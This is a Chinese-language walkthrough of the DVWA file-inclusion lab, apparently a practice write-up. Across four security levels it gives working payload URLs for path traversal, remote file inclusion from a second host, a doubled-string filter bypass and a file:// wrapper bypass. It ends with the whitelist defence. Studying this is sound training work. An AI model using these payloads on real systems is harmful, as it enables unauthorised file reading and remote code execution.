0x01 Low
源碼分析
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
?>
服務器端對page參數沒有做任何的過濾跟檢查。
預期操作是點擊下面的三個鏈接,服務器會包含相應的文件,並將結果返回。
本地包含(LFI)
-
報出絕對路徑
-
包含根目錄下的phpinfo.php
絕對路徑:http://192.168.115.134:8088/dvwa/vulnerabilities/fi/?page=C:\phpStudy\PHPTutorial\WWW\phpinfo.php 相對路徑:http://192.168.115.134:8088/dvwa/vulnerabilities/fi/?page=../../../phpinfo.php
遠程包含(RFI)
遠程服務器上傳phpinfo.php文件,內容如下
<?php
phpinfo();
?>
包含遠程服務器的phpinfo
http://192.168.115.134:8088/dvwa/vulnerabilities/fi/?page=http://192.168.31.87/phpinfo.php
0x02 Medium
源碼分析
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );
?>
str_replace函數將"http://",“https://”,"…/","…"替換爲空字符,可以雙寫繞過
本地包含(LFI)
絕對路徑:http://192.168.115.134:8088/dvwa/vulnerabilities/fi/?page=C:\phpStudy\PHPTutorial\WWW\phpinfo.php
相對路徑:http://192.168.115.134:8088/dvwa/vulnerabilities/fi/?page=..././..././..././phpinfo.php
遠程包含(RFI)
http://192.168.115.134:8088/dvwa/vulnerabilities/fi/?page=hthttp://tp://192.168.31.87/phpinfo.php
0x03 High
源碼分析
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
使用fnmatch函數檢查page參數,要求參數以file開頭或爲include.php,否則報錯。
可以用php僞協議file://讀取文件
payload
http://192.168.115.134:8088/dvwa/vulnerabilities/fi/?page=file://C:\phpStudy\PHPTutorial\WWW\phpinfo.php
0x04 Impossible
源碼分析
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
理想中的白名單防禦機制,只允許包含"include.php"、“file1.php”、“file2.php”、“file3.php”,徹底杜絕了文件包含漏洞 。